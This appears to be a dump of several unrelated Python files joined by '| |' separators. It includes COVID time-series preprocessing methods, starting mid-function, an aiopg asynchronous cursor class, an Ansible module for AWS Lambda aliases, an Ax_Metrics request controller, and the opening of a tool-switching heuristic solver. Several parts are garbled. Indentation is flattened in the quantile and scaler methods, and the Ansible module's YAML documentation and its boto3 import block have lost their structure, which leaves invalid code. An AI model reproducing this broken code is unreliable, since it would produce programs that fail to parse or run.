    A tuple of (transformed feature mapping, fitted scaler per feature).
  """
  transformed, scalers = {}, {}
  self._standard_ts_preprocessing(ts_features, initial_train_window_size,
                                  transformed, scalers)
  return transformed, scalers
def _standard_ts_preprocessing(
    self,
    ts_features,
    initial_train_window_size,
    transformed_features,
    feature_scalers,
):
  """Runs the standard time-series pre-processing pipeline.

  Copies the raw death/confirmed series through unchanged, produces
  pre-processed variants under `constants.DEATH_PREPROCESSED` and
  `constants.CONFIRMED_PREPROCESSED`, pre-processes every feature selected by
  `get_ts_features_to_preprocess`, and finally derives the
  `*_MEAN_TO_SUM_RATIO` features from the pre-processed series.

  Args:
    ts_features: A mapping from the feature name to its value, the value of
      each feature is a map from location to np.ndarray.
    initial_train_window_size: Size of initial training window.
    transformed_features: The output feature dictionary (mutated in place).
    feature_scalers: Output dict of fitted scalers (mutated in place).
  """
  # Death and confirmed counts are mandatory inputs.
  for required in (constants.DEATH, constants.CONFIRMED):
    if required not in ts_features:
      raise ValueError(f'{required} must be in the input features')
  transformed_features[constants.DEATH] = ts_features[constants.DEATH]
  transformed_features[constants.CONFIRMED] = ts_features[constants.CONFIRMED]
  # The raw series are re-emitted under the *_PREPROCESSED aliases, which are
  # always pre-processed in addition to the subclass-selected features.
  rename = {
      constants.DEATH: constants.DEATH_PREPROCESSED,
      constants.CONFIRMED: constants.CONFIRMED_PREPROCESSED,
  }
  selected = self.get_ts_features_to_preprocess() | set(rename.values())
  for raw_name, per_location in ts_features.items():
    out_name = rename.get(raw_name, raw_name)
    if out_name in transformed_features:
      # Never overwrite data that an earlier step already produced.
      continue
    if out_name in selected:
      logging.info('Preprocessing feature: %s', out_name)
      transformed_features[out_name], feature_scalers[out_name] = (
          self._preprocess_ts_feature(per_location,
                                      initial_train_window_size))
    else:
      transformed_features[out_name] = per_location
      feature_scalers[out_name] = None  # this feature was not scaled
  transformed_features[
      constants.
      CONFIRMED_PREPROCESSED_MEAN_TO_SUM_RATIO] = preprocessing.construct_feature_ratios(
          transformed_features[constants.CONFIRMED_PREPROCESSED])
  transformed_features[
      constants.
      DEATH_PREPROCESSED_MEAN_TO_SUM_RATIO] = preprocessing.construct_feature_ratios(
          transformed_features[constants.DEATH_PREPROCESSED])
def _preprocess_ts_feature(
    self,
    feature_data,
    initial_train_window_size,
    bfill_features=None,
    imputation_strategy=None,
    standardize=None,
    initial_value=None,
):
  """Pre-processes a single time-series feature.

  Any option left as None falls back to the value in
  `self.ts_preprocessing_config`.

  Args:
    feature_data: A single time-series feature dictionary.
    initial_train_window_size: The training window size.
    bfill_features: Backward fill imputation for time-series data.
    imputation_strategy: Additional imputation after ffill and bfill.
    standardize: Flag to indicate whether this feature is standardized.
    initial_value: If None no actions will be taken. Otherwise, the first
      value for each location will be set to this value if it is null.

  Returns:
    A tuple of (pre-processed feature data, fitted scaler).
  """
  cfg = self.ts_preprocessing_config
  if bfill_features is None:
    bfill_features = cfg.bfill_features
  if imputation_strategy is None:
    imputation_strategy = cfg.imputation_strategy
  if standardize is None:
    standardize = cfg.standardize
  return preprocessing.preprocess_ts_feature(
      feature_data,
      ffill_features=cfg.ffill_features,
      bfill_features=bfill_features,
      imputation_strategy=imputation_strategy,
      standardize=standardize,
      fitting_window=initial_train_window_size,
      initial_value=initial_value,
  )
  @abc.abstractmethod
  def get_model_spec(self,
                     model_type,
                     covariate_delay = 0,
                     **kwargs):
    # NOTE(review): the triple-quoted f-string below is an expression
    # statement, NOT a real docstring (f-strings are never assigned to
    # __doc__), which is why the pylint 'pointless-statement' disable is
    # required. Abstract: subclasses must implement this and return the
    # model spec for the requested model_type.
    f"""Return the model spec.
    Args:
      model_type: The type of the model. Currently supports:
        {constants.MODEL_TYPE_STATIC_SEIR}
        {constants.MODEL_TYPE_TIME_VARYING_WITH_COVARIATES}
        {constants.MODEL_TYPE_TREND_FOLLOWING}
      covariate_delay: The amount to delay the covariates. Defaults to 0.
      **kwargs: Additional kwargs.
    Returns:
      The corresponding model spec.
    """ # pylint: disable=pointless-statement
def initialize_quantile_variables(
self,
hparams,
num_quantiles,
):
"""Creates the trainable tensors for quantile regression.
Args:
hparams: The hyperparameters including the quantile_encoding_window.
num_quantiles: The number of output quantiles (e.g. 23).
Returns:
The 3D trainable kernel for the quantile estimation. Of size:
quantile_encoding_window * number of features x number of states x
number of quantiles.
The 2D trainable biases for the quantile estimation. Of size:
number of states x number of quantiles.
"""
quantile_encoding_window = hparams['quantile_encoding_window']
initial_kernel = np.zeros(
(quantile_encoding_window * self._NUM_QUANTILE_FEATURES,
self._NUM_STATES, num_quantiles))
quantile_kernel = tf.Variable(initial_kernel, dtype=tf.float32)
initial_biases = (0.1 / num_quantiles) * np.ones(
(self._NUM_STATES, num_quantiles))
quantile_biases = tf.Variable(initial_biases, dtype=tf.float32)
return quantile_kernel, quantile_biases
def gt_scaler(
self,
ground_truth_timeseries,
num_time_steps,
):
"""Get min/max values of each covariate.
These we be used to scale the predictions so that they match the
preprocessed features created from the ground truth.
Args:
ground_truth_timeseries: The ground truth data including the GT confirmed
and death values.
num_time_steps: The number of time steps over which to compute the maximum
and minimum values.
Returns:
A dictionary with keys of confirmed and death where each value is a
dictionary of the minimum and maximum values in the time range.
"""
(_, gt_list, _, _, _) = ground_truth_timeseries
confirmed_scaler = {
'min': np.min(gt_list['confirmed'][:num_time_steps]),
'max': np.max(gt_list['confirmed'][:num_time_steps]),
}
death_scaler = {
'min': np.min(gt_list['death'][:num_time_steps]),
'max': np.max(gt_list['death'][:num_time_steps]),
}
return {'confirmed': confirmed_scaler, 'death': death_scaler}
| |
import asyncio
import warnings
import psycopg2
from .log import logger
from .utils import PY_35, PY_352
class Cursor:
    """Async wrapper around a psycopg2 cursor bound to an aiopg connection."""

    def __init__(self, conn, impl, timeout, echo):
        # conn: owning aiopg Connection (supplies waiters/polling).
        # impl: underlying psycopg2 cursor.
        # timeout: default timeout (seconds) for cursor operations.
        # echo: when True, log every operation and its parameters.
        self._conn = conn
        self._impl = impl
        self._timeout = timeout
        self._echo = echo

    @property
    def echo(self):
        """Return echo mode status."""
        return self._echo

    @property
    def description(self):
        """This read-only attribute is a sequence of 7-item sequences.
        Each of these sequences is a collections.namedtuple containing
        information describing one result column:
        0.  name: the name of the column returned.
        1.  type_code: the PostgreSQL OID of the column.
        2.  display_size: the actual length of the column in bytes.
        3.  internal_size: the size in bytes of the column associated to
            this column on the server.
        4.  precision: total number of significant digits in columns of
            type NUMERIC. None for other types.
        5.  scale: count of decimal digits in the fractional part in
            columns of type NUMERIC. None for other types.
        6.  null_ok: always None as not easy to retrieve from the libpq.
        This attribute will be None for operations that do not
        return rows or if the cursor has not had an operation invoked
        via the execute() method yet.
        """
        return self._impl.description

    def close(self):
        """Close the cursor now."""
        self._impl.close()

    @property
    def closed(self):
        """Read-only boolean attribute: specifies if the cursor is closed."""
        return self._impl.closed

    @property
    def connection(self):
        """Read-only attribute returning a reference to the `Connection`."""
        return self._conn

    @property
    def raw(self):
        """Underlying psycopg cursor object, readonly"""
        return self._impl

    @property
    def name(self):
        # Not supported
        return self._impl.name

    @property
    def scrollable(self):
        # Not supported
        return self._impl.scrollable

    @scrollable.setter
    def scrollable(self, val):
        # Not supported
        self._impl.scrollable = val

    @property
    def withhold(self):
        # Not supported
        return self._impl.withhold

    @withhold.setter
    def withhold(self, val):
        # Not supported
        self._impl.withhold = val

    @asyncio.coroutine
    def execute(self, operation, parameters=None, *, timeout=None):
        """Prepare and execute a database operation (query or command).

        Parameters may be provided as sequence or mapping and will be
        bound to variables in the operation. Variables are specified
        either with positional %s or named %({name})s placeholders.
        """
        if timeout is None:
            timeout = self._timeout
        waiter = self._conn._create_waiter('cursor.execute')
        if self._echo:
            logger.info(operation)
            logger.info("%r", parameters)
        try:
            self._impl.execute(operation, parameters)
        except:  # noqa: E722 -- deliberately broad: the waiter must be
            # cleared even for BaseException before re-raising.
            self._conn._waiter = None
            raise
        try:
            yield from self._conn._poll(waiter, timeout)
        except asyncio.TimeoutError:
            # The query may still be running server-side; close the cursor
            # so the connection is not left with a dangling operation.
            self._impl.close()
            raise

    @asyncio.coroutine
    def executemany(self, operation, seq_of_parameters):
        # Not supported
        raise psycopg2.ProgrammingError(
            "executemany cannot be used in asynchronous mode")

    @asyncio.coroutine
    def callproc(self, procname, parameters=None, *, timeout=None):
        """Call a stored database procedure with the given name.

        The sequence of parameters must contain one entry for each
        argument that the procedure expects. The result of the call is
        returned as modified copy of the input sequence. Input
        parameters are left untouched, output and input/output
        parameters replaced with possibly new values.
        """
        if timeout is None:
            timeout = self._timeout
        waiter = self._conn._create_waiter('cursor.callproc')
        if self._echo:
            logger.info("CALL %s", procname)
            logger.info("%r", parameters)
        try:
            self._impl.callproc(procname, parameters)
        except:  # noqa: E722 -- see execute(): clear waiter, then re-raise.
            self._conn._waiter = None
            raise
        else:
            yield from self._conn._poll(waiter, timeout)

    @asyncio.coroutine
    def mogrify(self, operation, parameters=None):
        """Return a query string after arguments binding.

        The string returned is exactly the one that would be sent to
        the database running the .execute() method or similar.
        """
        ret = self._impl.mogrify(operation, parameters)
        assert not self._conn._isexecuting(), ("Don't support server side "
                                               "mogrify")
        return ret

    @asyncio.coroutine
    def setinputsizes(self, sizes):
        """This method is exposed in compliance with the DBAPI.

        It currently does nothing but it is safe to call it.
        """
        self._impl.setinputsizes(sizes)

    @asyncio.coroutine
    def fetchone(self):
        """Fetch the next row of a query result set.

        Returns a single tuple, or None when no more data is
        available.
        """
        ret = self._impl.fetchone()
        assert not self._conn._isexecuting(), ("Don't support server side "
                                               "cursors yet")
        return ret

    @asyncio.coroutine
    def fetchmany(self, size=None):
        """Fetch the next set of rows of a query result.

        Returns a list of tuples. An empty list is returned when no
        more rows are available.

        The number of rows to fetch per call is specified by the
        parameter. If it is not given, the cursor's .arraysize
        determines the number of rows to be fetched. The method should
        try to fetch as many rows as indicated by the size
        parameter. If this is not possible due to the specified number
        of rows not being available, fewer rows may be returned.
        """
        if size is None:
            size = self._impl.arraysize
        ret = self._impl.fetchmany(size)
        assert not self._conn._isexecuting(), ("Don't support server side "
                                               "cursors yet")
        return ret

    @asyncio.coroutine
    def fetchall(self):
        """Fetch all (remaining) rows of a query result.

        Returns them as a list of tuples. An empty list is returned
        if there is no more record to fetch.
        """
        ret = self._impl.fetchall()
        assert not self._conn._isexecuting(), ("Don't support server side "
                                               "cursors yet")
        return ret

    @asyncio.coroutine
    def scroll(self, value, mode="relative"):
        """Scroll to a new position according to mode.

        If mode is relative (default), value is taken as offset
        to the current position in the result set, if set to
        absolute, value states an absolute target position.
        """
        ret = self._impl.scroll(value, mode)
        assert not self._conn._isexecuting(), ("Don't support server side "
                                               "cursors yet")
        return ret

    @property
    def arraysize(self):
        """How many rows will be returned by fetchmany() call.

        This read/write attribute specifies the number of rows to
        fetch at a time with fetchmany(). It defaults to
        1 meaning to fetch a single row at a time.
        """
        return self._impl.arraysize

    @arraysize.setter
    def arraysize(self, val):
        """How many rows will be returned by fetchmany() call.

        This read/write attribute specifies the number of rows to
        fetch at a time with fetchmany(). It defaults to
        1 meaning to fetch a single row at a time.
        """
        self._impl.arraysize = val

    @property
    def itersize(self):
        # Not supported
        return self._impl.itersize

    @itersize.setter
    def itersize(self, val):
        # Not supported
        self._impl.itersize = val

    @property
    def rowcount(self):
        """Returns the number of rows that has been produced or affected.

        This read-only attribute specifies the number of rows that the
        last :meth:`execute` produced (for Data Query Language
        statements like SELECT) or affected (for Data Manipulation
        Language statements like UPDATE or INSERT).

        The attribute is -1 in case no .execute() has been performed
        on the cursor or the row count of the last operation if it
        can't be determined by the interface.
        """
        return self._impl.rowcount

    @property
    def rownumber(self):
        """Row index.

        This read-only attribute provides the current 0-based index of the
        cursor in the result set or ``None`` if the index cannot be
        determined."""
        return self._impl.rownumber

    @property
    def lastrowid(self):
        """OID of the last inserted row.

        This read-only attribute provides the OID of the last row
        inserted by the cursor. If the table wasn't created with OID
        support or the last operation is not a single record insert,
        the attribute is set to None.
        """
        return self._impl.lastrowid

    @property
    def query(self):
        """The last executed query string.

        Read-only attribute containing the body of the last query sent
        to the backend (including bound arguments) as bytes
        string. None if no query has been executed yet.
        """
        return self._impl.query

    @property
    def statusmessage(self):
        """the message returned by the last command."""
        return self._impl.statusmessage

    # @asyncio.coroutine
    # def cast(self, old, s):
    #     ...

    @property
    def tzinfo_factory(self):
        """The time zone factory used to handle data types such as
        `TIMESTAMP WITH TIME ZONE`.
        """
        return self._impl.tzinfo_factory

    @tzinfo_factory.setter
    def tzinfo_factory(self, val):
        """The time zone factory used to handle data types such as
        `TIMESTAMP WITH TIME ZONE`.
        """
        self._impl.tzinfo_factory = val

    @asyncio.coroutine
    def nextset(self):
        # Not supported
        self._impl.nextset()  # raises psycopg2.NotSupportedError

    @asyncio.coroutine
    def setoutputsize(self, size, column=None):
        # Does nothing
        self._impl.setoutputsize(size, column)

    @asyncio.coroutine
    def copy_from(self, file, table, sep='\t', null='\\N', size=8192,
                  columns=None):
        raise psycopg2.ProgrammingError(
            "copy_from cannot be used in asynchronous mode")

    @asyncio.coroutine
    def copy_to(self, file, table, sep='\t', null='\\N', columns=None):
        raise psycopg2.ProgrammingError(
            "copy_to cannot be used in asynchronous mode")

    @asyncio.coroutine
    def copy_expert(self, sql, file, size=8192):
        raise psycopg2.ProgrammingError(
            "copy_expert cannot be used in asynchronous mode")

    @property
    def timeout(self):
        """Return default timeout for cursor operations."""
        return self._timeout

    def __iter__(self):
        warnings.warn("Iteration over cursor is deprecated",
                      DeprecationWarning,
                      stacklevel=2)
        while True:
            row = yield from self.fetchone()
            if row is None:
                # BUGFIX (PEP 479): 'raise StopIteration' inside a generator
                # becomes RuntimeError on Python 3.7+; 'return' ends the
                # iteration cleanly with identical semantics.
                return
            else:
                yield row

    if PY_35:  # pragma: no branch
        def __aiter__(self):
            return self

        if not PY_352:
            __aiter__ = asyncio.coroutine(__aiter__)

        @asyncio.coroutine
        def __anext__(self):
            ret = yield from self.fetchone()
            if ret is not None:
                return ret
            else:
                raise StopAsyncIteration  # noqa

        @asyncio.coroutine
        def __aenter__(self):
            return self

        @asyncio.coroutine
        def __aexit__(self, exc_type, exc_val, exc_tb):
            self.close()
            return
| |
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Standard Ansible module metadata: community-supported module in preview status.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
---
module: lambda_alias
short_description: Creates, updates or deletes AWS Lambda function aliases.
description:
    - This module allows the management of AWS Lambda function aliases via the Ansible
framework. It is idempotent and supports "Check" mode. Use module M(lambda) to manage the lambda function
itself and M(lambda_event) to manage event source mappings.
version_added: "2.2"
author: Pierre Jodouin (@pjodouin), Ryan Scott Brown (@ryansb)
options:
function_name:
description:
- The name of the function alias.
required: true
state:
description:
- Describes the desired state.
required: true
default: "present"
choices: ["present", "absent"]
name:
description:
- Name of the function alias.
required: true
aliases: ['alias_name']
description:
description:
- A short, user-defined function alias description.
required: false
version:
description:
- Version associated with the Lambda function alias.
A value of 0 (or omitted parameter) sets the alias to the $LATEST version.
required: false
aliases: ['function_version']
requirements:
- boto3
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
---
# Simple example to create a lambda function and publish a version
- hosts: localhost
gather_facts: no
vars:
state: present
project_folder: /path/to/deployment/package
deployment_package: lambda.zip
account: 123456789012
production_version: 5
tasks:
- name: AWS Lambda Function
lambda:
state: "{{ state | default('present') }}"
name: myLambdaFunction
publish: True
description: lambda function description
code_s3_bucket: package-bucket
code_s3_key: "lambda/{{ deployment_package }}"
local_path: "{{ project_folder }}/{{ deployment_package }}"
runtime: python2.7
timeout: 5
handler: lambda.handler
memory_size: 128
role: "arn:aws:iam::{{ account }}:role/API2LambdaExecRole"
- name: Get information
lambda_info:
name: myLambdaFunction
register: lambda_info
- name: show results
debug:
msg: "{{ lambda_info['lambda_facts'] }}"
# The following will set the Dev alias to the latest version ($LATEST) since version is omitted (or = 0)
- name: "alias 'Dev' for function {{ lambda_info.lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_info.lambda_facts.FunctionName }}"
name: Dev
description: Development is $LATEST version
# The QA alias will only be created when a new version is published (i.e. not = '$LATEST')
- name: "alias 'QA' for function {{ lambda_info.lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_info.lambda_facts.FunctionName }}"
name: QA
version: "{{ lambda_info.lambda_facts.Version }}"
description: "QA is version {{ lambda_info.lambda_facts.Version }}"
when: lambda_info.lambda_facts.Version != "$LATEST"
# The Prod alias will have a fixed version based on a variable
- name: "alias 'Prod' for function {{ lambda_info.lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_info.lambda_facts.FunctionName }}"
name: Prod
version: "{{ production_version }}"
description: "Production is version {{ production_version }}"
'''
RETURN = '''
---
alias_arn:
description: Full ARN of the function, including the alias
returned: success
type: str
sample: arn:aws:lambda:us-west-2:123456789012:function:myFunction:dev
description:
description: A short description of the alias
returned: success
type: str
sample: The development stage for my hot new app
function_version:
description: The qualifier that the alias refers to
returned: success
type: str
sample: $LATEST
name:
description: The name of the alias assigned
returned: success
type: str
sample: dev
'''
import re
try:
import boto3
from botocore.exceptions import ClientError, ParamValidationError, MissingParametersError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (HAS_BOTO3, boto3_conn, camel_dict_to_snake_dict, ec2_argument_spec,
get_aws_connection_info)
class AWSConnection:
    """
    Create the connection object and client objects as required.
    """

    def __init__(self, ansible_obj, resources, boto3_=True):
        try:
            (self.region, self.endpoint,
             aws_connect_kwargs) = get_aws_connection_info(ansible_obj, boto3=boto3_)

            self.resource_client = {}
            if not resources:
                resources = ['lambda']

            # An IAM client is always needed to resolve the account id.
            resources.append('iam')

            for resource in resources:
                aws_connect_kwargs.update(
                    region=self.region,
                    endpoint=self.endpoint,
                    conn_type='client',
                    resource=resource,
                )
                self.resource_client[resource] = boto3_conn(ansible_obj, **aws_connect_kwargs)

            # if region is not provided, then get default profile/session region
            if not self.region:
                self.region = self.resource_client['lambda'].meta.region_name

        except (ClientError, ParamValidationError, MissingParametersError) as e:
            ansible_obj.fail_json(msg="Unable to connect, authorize or access resource: {0}".format(e))

        # Best effort: fall back to an empty account id when it cannot be
        # derived from the caller's IAM user ARN.
        try:
            self.account_id = self.resource_client['iam'].get_user()['User']['Arn'].split(':')[4]
        except (ClientError, ValueError, KeyError, IndexError):
            self.account_id = ''

    def client(self, resource='lambda'):
        """Return the cached boto3 client for *resource* (default: 'lambda')."""
        return self.resource_client[resource]
def pc(key):
    """
    Changes python key into Pascale case equivalent. For example, 'this_function_name' becomes 'ThisFunctionName'.

    :param key: snake_case parameter name
    :return: PascalCase equivalent
    """
    parts = []
    for token in key.split('_'):
        parts.append(token.capitalize())
    return "".join(parts)
def set_api_params(module, module_params):
    """
    Sets module parameters to those expected by the boto3 API.

    Only parameters with truthy values are included, keyed by their
    PascalCase (boto3) names.

    :param module: Ansible module reference
    :param module_params: iterable of snake_case parameter names
    :return: dict of boto3 API parameters
    """
    params = module.params
    return {pc(name): params[name] for name in module_params if params.get(name)}
def validate_params(module, aws):
    """
    Performs basic parameter validation.

    :param module: Ansible module reference
    :param aws: AWS client connection (unused; kept for signature compatibility)
    :return: None (mutates module.params['function_version'] in place)
    """
    function_name = module.params['function_name']

    # validate function name: the regex permits word characters
    # (letters, digits, underscore), hyphens and colons.
    if not re.search(r'^[\w\-:]+$', function_name):
        module.fail_json(
            msg='Function name {0} is invalid. Names must contain only alphanumeric characters, '
                'underscores, hyphens and colons.'.format(function_name)
        )
    if len(function_name) > 64:
        module.fail_json(msg='Function name "{0}" exceeds 64 character limit'.format(function_name))

    # if parameter 'function_version' is zero, set it to $LATEST, else convert
    # it to a string (the AWS API expects the qualifier as a string).
    if module.params['function_version'] == 0:
        module.params['function_version'] = '$LATEST'
    else:
        module.params['function_version'] = str(module.params['function_version'])

    return
def get_lambda_alias(module, aws):
    """
    Returns the lambda function alias if it exists.

    :param module: Ansible module reference
    :param aws: AWS client connection
    :return: alias facts dict from GetAlias, or None when the alias does not exist
    """
    client = aws.client('lambda')

    # set API parameters
    api_params = set_api_params(module, ('function_name', 'name'))

    # check if alias exists and get facts
    try:
        results = client.get_alias(**api_params)
    except ClientError as e:
        # Only ClientError carries a .response payload. The previous code
        # also caught ParamValidationError/MissingParametersError in this
        # branch and crashed with AttributeError on e.response.
        if e.response['Error']['Code'] == 'ResourceNotFoundException':
            results = None
        else:
            module.fail_json(msg='Error retrieving function alias: {0}'.format(e))
    except (ParamValidationError, MissingParametersError) as e:
        module.fail_json(msg='Error retrieving function alias: {0}'.format(e))

    return results
def lambda_alias(module, aws):
    """
    Adds, updates or deletes lambda function aliases.

    :param module: Ansible module reference
    :param aws: AWS client connection
    :return dict: 'changed' flag merged with the alias facts returned by AWS
        (or the previously fetched facts when no API call was made,
        e.g. in check mode).
    """
    client = aws.client('lambda')
    results = dict()
    changed = False
    current_state = 'absent'
    state = module.params['state']

    facts = get_lambda_alias(module, aws)
    if facts:
        current_state = 'present'

    if state == 'present':
        if current_state == 'present':

            # check if alias has changed -- only version and description can change
            alias_params = ('function_version', 'description')
            for param in alias_params:
                # facts keys are PascalCase (AWS API), hence pc(param).
                if module.params.get(param) != facts.get(pc(param)):
                    changed = True
                    break

            if changed:
                api_params = set_api_params(module, ('function_name', 'name'))
                api_params.update(set_api_params(module, alias_params))

                if not module.check_mode:
                    try:
                        results = client.update_alias(**api_params)
                    except (ClientError, ParamValidationError, MissingParametersError) as e:
                        module.fail_json(msg='Error updating function alias: {0}'.format(e))

        else:
            # create new function alias
            api_params = set_api_params(module, ('function_name', 'name', 'function_version', 'description'))

            try:
                if not module.check_mode:
                    results = client.create_alias(**api_params)
                # NOTE(review): 'changed' is reported even in check mode here
                # (the create would happen) -- intentional check-mode behavior.
                changed = True
            except (ClientError, ParamValidationError, MissingParametersError) as e:
                module.fail_json(msg='Error creating function alias: {0}'.format(e))

    else:  # state = 'absent'
        if current_state == 'present':
            # delete the function
            api_params = set_api_params(module, ('function_name', 'name'))

            try:
                if not module.check_mode:
                    results = client.delete_alias(**api_params)
                changed = True
            except (ClientError, ParamValidationError, MissingParametersError) as e:
                module.fail_json(msg='Error deleting function alias: {0}'.format(e))

    # Prefer fresh API results; fall back to previously fetched facts.
    return dict(changed=changed, **dict(results or facts))
def main():
    """
    Main entry point.

    :return dict: ansible facts (via module.exit_json)
    """
    argument_spec = ec2_argument_spec()
    argument_spec.update(
        dict(
            state=dict(required=False, default='present', choices=['present', 'absent']),
            # required parameters must not also declare a default
            # (flagged by ansible-test sanity checks).
            function_name=dict(required=True),
            name=dict(required=True, aliases=['alias_name']),
            function_version=dict(type='int', required=False, default=0, aliases=['version']),
            description=dict(required=False, default=None),
        )
    )

    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
        mutually_exclusive=[],
        required_together=[]
    )

    # validate dependencies
    if not HAS_BOTO3:
        module.fail_json(msg='boto3 is required for this module.')

    aws = AWSConnection(module, ['lambda'])

    validate_params(module, aws)

    results = lambda_alias(module, aws)

    module.exit_json(**camel_dict_to_snake_dict(results))
# Run the module entry point when executed directly by Ansible.
if __name__ == '__main__':
    main()
| |
"""
Ax_Metrics - Servant Main Controller - Recommended Ax_Metrics Public Interface
------------------------------------------------------------------------------
Author: Dan Kamins <dos at axonchisel dot net>
Copyright (c) 2014 Dan Kamins, AxonChisel.net
"""
# ----------------------------------------------------------------------------
import time
import copy
from axonchisel.metrics.foundation.ax.obj import AxObj
import axonchisel.metrics.foundation.ax.plugin as axplugin
from axonchisel.metrics.foundation.data.multi import MultiDataSeries
from axonchisel.metrics.foundation.query.qghosts import QGhosts
from axonchisel.metrics.io.erout.interface import EROut
from axonchisel.metrics.run.mqengine.mqengine import MQEngine
from .config import ServantConfig
from .request import ServantRequest
from .state import ServantState
import logging
log = logging.getLogger(__name__)
# ----------------------------------------------------------------------------
class Servant(AxObj):
    """
    Servant Main Controller and public interface.

    This is the recommended application layer interface to Ax_Metrics.

    Usage:
     1. Load MetSet (all metrics) and QuerySet (all queries).
     2. Construct and populate ServantConfig object, including
        MetSet, QuerySet, and emfetch_extinfo and erout_extinfo
        (containing output targets such as streams to write to).
     3. Construct Servant instance around ServantConfig.
     4. Construct and populate ServantRequest object, including
        list of queries (by id) to run and list of EROut plugins (by id)
        to process results with.
     5. Invoke servant.query(request).
     6. Optionally repeat with additional ServantRequests.

    Lifecycle: A Servant instance can process as many requests
    as desired, but only one at a time.
    EROut plugins are created and destroyed around each request
    (which may itself contain multiple queries).
    """

    def __init__(self, config):
        # Set valid default state:
        self._config = None           # (ServantConfig)
        self._state = None            # (ServantState)
        self._reset_state()

        # Apply initial values from kwargs:
        self._assert_type("config", config, ServantConfig)
        self._config = config

        # Log begin:
        log.info("Servant initialized (%s)", config)

    #
    # Public Methods
    #

    def process(self, request):
        """
        Main entry-point to process ServantRequest.

        EROut plugins are destroyed in a ``finally`` block so that plugin
        cleanup runs even when query execution raises (previously a failing
        query leaked the created plugins).
        """
        self._assert_type("request", request, ServantRequest)

        # Log begin:
        t0 = time.time()
        log.info("Processing Request %s", request)

        self._reset_state(request)
        try:
            self._create_erouts()
            self._create_mqengine()
            self._run_queries()
        finally:
            # Destroys whatever EROuts were successfully created, even if
            # creation itself failed part-way through.
            self._destroy_erouts()

        # Log end:
        t9 = time.time()
        log.info("Completed Request %s in %0.3fs", request, t9-t0)

    #
    # Public Properties
    #

    @property
    def config(self):
        """ServantConfig, as specified at construction time."""
        return self._config

    #
    # Internal Methods
    #

    def _reset_state(self, request=None):
        """Reset internal state, optionally around given request."""
        self._state = ServantState()
        if request is not None:
            self._state.request = request

    def _create_erouts(self):
        """Instantiate and startup the EROut plugins and add to state."""
        erout_plugin_ids = self._state.request.erout_plugin_ids
        log.info("Creating EROuts (%s)", erout_plugin_ids)
        # 'plugin_id' (not 'id') to avoid shadowing the builtin.
        for plugin_id in erout_plugin_ids:
            ero = self._create_erout(plugin_id)
            self._state.erouts.append(ero)

    def _create_erout(self, erout_plugin_id):
        """Instantiate and startup single EROut plugin by id, returning it."""
        plugin_load = {
            'what': "EROut Plugin",
            'def_module_name': 'axonchisel.metrics.io.erout.plugins',
            'def_cls_name_pfx': 'EROut_',
            'require_base_cls': EROut,
            'plugin_id': erout_plugin_id,
        }
        cls = axplugin.load_plugin_class(**plugin_load)
        extinfo = self._config.erout_extinfo_for(erout_plugin_id)
        ero = cls(extinfo=extinfo)
        ero.plugin_create()
        return ero

    def _destroy_erouts(self):
        """Final destroy cleanup on EROut plugins."""
        log.info("Destroying EROuts (%s)", self._state.erouts)
        for ero in self._state.erouts:
            ero.plugin_destroy()

    def _create_mqengine(self):
        """Create and configure MQEngine, storing in state."""
        log.info("Creating MQEngine")
        self._state.mqengine = MQEngine(
            metset = self._config.metset,
            emfetch_extinfo = self._config.emfetch_extinfo,
        )

    def _run_queries(self):
        """Run our queries and output results -- the core logic loop."""
        # Iterate requested queries:
        query_ids = self._state.request.query_ids
        for i, query_id in enumerate(query_ids):
            log.info("Running query (%d/%d) #%s", i+1, len(query_ids), query_id)

            # Load and adjust query:
            q = self._config.queryset.get_query_by_id(query_id)
            if self._state.request.collapse:
                q = self._collapse_query(q)
            if self._state.request.noghosts:
                q = self._bust_query_ghosts(q)

            # Run query in MQEngine
            mdseries = self._state.mqengine.query(q)
            if self._state.request.collapse:
                mdseries = self._collapse_mdseries(mdseries)

            # Process query results through all EROuts:
            for ero in self._state.erouts:
                ero.output(mdseries, query=q)

    def _collapse_query(self, q):
        """
        Return copy of query, collapsed for collapse mode.
        Collapsing the query does:
          - query framespec granularity is set to match range unit
          - query framespec accumulate mode is enabled
        """
        q = copy.deepcopy(q)
        tmfrspec = q.qtimeframe.tmfrspec
        tmfrspec.accumulate = True
        tmfrspec.gran_unit = tmfrspec.range_unit
        return q

    def _bust_query_ghosts(self, q):
        """
        Return copy of query, with ghosts removed.
        """
        q = copy.deepcopy(q)
        q.qghosts = QGhosts()
        return q

    def _collapse_mdseries(self, mdseries):
        """
        Return copy of MultiDataSeries, collapsed for collapse mode.
        Collapsing the MultiDataSeries does:
          - only last data point of each series is preserved.
        """
        mdseries2 = MultiDataSeries()
        for dseries in mdseries.iter_series():
            dseries2 = copy.deepcopy(dseries)
            dseries2.reset_points()
            dseries2.add_point(dseries.get_point(-1))  # (keep only last point)
            mdseries2.add_series(dseries2)
        return mdseries2

    def __unicode__(self):
        return (u"Servant({self._config}, {self._state})"
                .format(self=self))
| |
########################################################################################################################
# Heuristic Solver for the Tool Switching Problem
#
# Exercises for WS15 Computational Techniques
# Group members (alphabetical): Morariu, Smolka, Zeba
########################################################################################################################
import copy
import random
import math
import itertools
import collections
########################################################################################################################
#
# Neighborhood Structures
# (Exercise 3)
#
########################################################################################################################
def singleRandomSwapNeighborhood(job_sequence, resolution=1):
    """Yield len(job_sequence)*resolution - 1 neighbors, each a copy of the
    sequence with one randomly chosen pair of distinct positions swapped."""
    total = len(job_sequence) * resolution
    for _ in range(1, total):
        candidate = copy.deepcopy(job_sequence)
        first = second = 0
        # Re-draw until the two swap positions differ.
        while first == second:
            first = random.randrange(0, len(job_sequence))
            second = random.randrange(0, len(job_sequence))
        candidate[first], candidate[second] = candidate[second], candidate[first]
        yield candidate
